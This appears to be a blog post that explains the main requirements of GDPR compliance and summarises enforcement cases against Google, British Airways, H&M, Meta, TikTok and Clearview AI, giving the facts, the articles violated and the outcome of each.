Data protection implementation under GDPR
The General Data Protection Regulation (GDPR) is a comprehensive data protection law that came into effect across the European Union (EU) on May 25, 2018. It aims to give individuals more control over their personal data and to unify data protection laws across Europe.
Implementing GDPR involves various principles like lawfulness, fairness, transparency, purpose limitation, data minimization, accuracy, storage limitation, integrity, and confidentiality, and the demonstration of accountability. Organizations that fail to comply face significant financial penalties.
Below is a detailed explanation of data protection implementation under GDPR, followed by in-depth case law analysis of more than five significant GDPR enforcement cases.
📌 GDPR Data Protection Implementation – Key Components
1. Lawful Basis for Processing
Organizations must have a legal basis to process personal data. Common bases include consent, contractual necessity, legal obligation, protection of vital interests, public task, and legitimate interest.
2. Data Subject Rights
GDPR grants individuals the following rights:
Right to be informed
Right of access
Right to rectification
Right to erasure (right to be forgotten)
Right to restrict processing
Right to data portability
Right to object
Rights in relation to automated decision making and profiling
3. Data Protection by Design and by Default
Organizations must embed data protection into processing activities and business practices from the start (design phase).
4. Data Protection Impact Assessments (DPIAs)
Required for high-risk processing operations to identify and minimize data protection risks.
5. Record of Processing Activities (ROPA)
Organizations must maintain records of all data processing activities.
6. Appointment of Data Protection Officer (DPO)
Certain organizations must appoint a DPO to oversee GDPR compliance.
7. Security Measures
Technical and organizational measures must be implemented to ensure data security.
8. Breach Notification
Data breaches must be reported to supervisory authorities within 72 hours.
⚖️ GDPR Case Law – Detailed Analysis of Landmark Cases
Case 1: Google LLC (France – CNIL) – €50 million fine (2019)
Facts:
The French data protection authority CNIL fined Google €50 million for lack of transparency and valid consent in advertising personalization.
Issues:
Google did not provide clear, accessible information to users about data processing.
Users were not adequately informed about how their data would be used for ad personalization.
Consent was not specific or unambiguous—users were forced to accept everything via pre-ticked boxes.
GDPR Violations:
Article 6 (lawful basis for processing)
Article 13 and 14 (right to be informed)
Article 7 (conditions for consent)
Outcome:
This was the first major penalty under GDPR. CNIL emphasized that consent must be informed, specific, and freely given. Google’s structure of information made it difficult for users to understand data processing operations.
Significance:
Highlighted the importance of transparency and clear user interfaces for obtaining consent.
Case 2: British Airways – £20 million fine (UK, ICO – 2020)
Facts:
British Airways suffered a data breach in 2018 where the personal data of over 400,000 customers was compromised, including login, payment card, and travel booking details.
Cause:
The breach was caused by poor security arrangements. Hackers redirected BA customers to a fraudulent site and collected their information.
GDPR Violations:
Article 32 (security of processing)
Article 5(1)(f) (integrity and confidentiality)
Outcome:
The ICO originally intended to fine BA £183 million, but due to COVID-19’s economic impact, reduced it to £20 million.
The regulator found that the airline failed to detect the attack and protect user data adequately.
Significance:
Reinforced the need for robust cybersecurity measures and regular security audits.
Case 3: H&M (Germany – Hamburg DPA) – €35.3 million fine (2020)
Facts:
H&M was fined for unlawfully collecting and storing excessive data about employees, including information on family issues, religious beliefs, and illnesses, often obtained from casual conversations.
GDPR Violations:
Articles 5(1)(a) (lawfulness, fairness, and transparency)
Article 6 (lawful basis for processing)
Article 9 (processing of special categories of data)
Outcome:
H&M violated employees’ privacy by maintaining detailed personal records that were accessible to many managers.
After discovery, H&M took steps to improve privacy practices and compensated affected employees.
Significance:
Underlined the importance of protecting employee data and applying GDPR principles internally within organizations.
Case 4: Meta (Ireland – DPC) – €1.2 billion fine (2023)
Facts:
Meta (Facebook) transferred EU users' data to the U.S. without adequate protection, violating GDPR's rules on international data transfers.
Key Issue:
The use of Standard Contractual Clauses (SCCs) was deemed insufficient without additional safeguards.
The U.S. lacked equivalent data protection guarantees, as highlighted in the Schrems II case by the CJEU (Court of Justice of the EU).
GDPR Violations:
Chapter V (international transfers)
Article 46 (appropriate safeguards)
Article 5(1)(a) (lawfulness, fairness)
Outcome:
Record-breaking €1.2 billion fine
Meta was ordered to suspend EU-US data transfers.
Significance:
This case reaffirmed that international data transfers must include enforceable data subject rights and effective legal remedies.
Case 5: TikTok (Ireland – DPC) – €345 million fine (2023)
Facts:
TikTok was fined for violations relating to the processing of children’s data between July and December 2020.
Issues:
Accounts for minors were set to public by default.
Lack of transparency in explaining data processing to children.
“Family pairing” feature allowed adults to control children’s accounts without verification of adult identity.
GDPR Violations:
Article 5(1)(a) (fairness and transparency)
Article 12, 13 (clear information)
Article 25 (data protection by design and by default)
Outcome:
TikTok was ordered to change its platform design and privacy settings, particularly for minors.
Significance:
Demonstrated that protecting children's data is a high priority under GDPR. Platforms must ensure data protection by design.
Case 6: Clearview AI – Multiple EU Fines (France, Italy, Greece)
Facts:
Clearview AI scraped billions of facial images from public websites without consent and built a facial recognition database sold to law enforcement.
GDPR Violations:
Article 6 (lawful basis)
Article 9 (special category data – biometric)
Article 14 (right to be informed)
Article 15-21 (data subject rights)
Outcome:
Several EU data protection authorities (France, Italy, Greece) ordered Clearview AI to delete EU residents' data and imposed fines exceeding €50 million combined.
Significance:
Clearview's case illustrates that biometric data requires explicit consent and that even companies outside the EU must comply with GDPR if they process EU citizens' data.
✅ Conclusion
These cases demonstrate that GDPR is being actively enforced and that fines are substantial, particularly for:
Inadequate consent mechanisms
Poor security practices
Failure to protect children's data
Unlawful data transfers
Mishandling employee or biometric data
Best practices for GDPR compliance include:
Conducting DPIAs
Ensuring transparent privacy notices
Using robust security controls
Maintaining up-to-date processing records
Appointing a DPO when required
Responding promptly to data subject requests
RELATED Blog
0 comments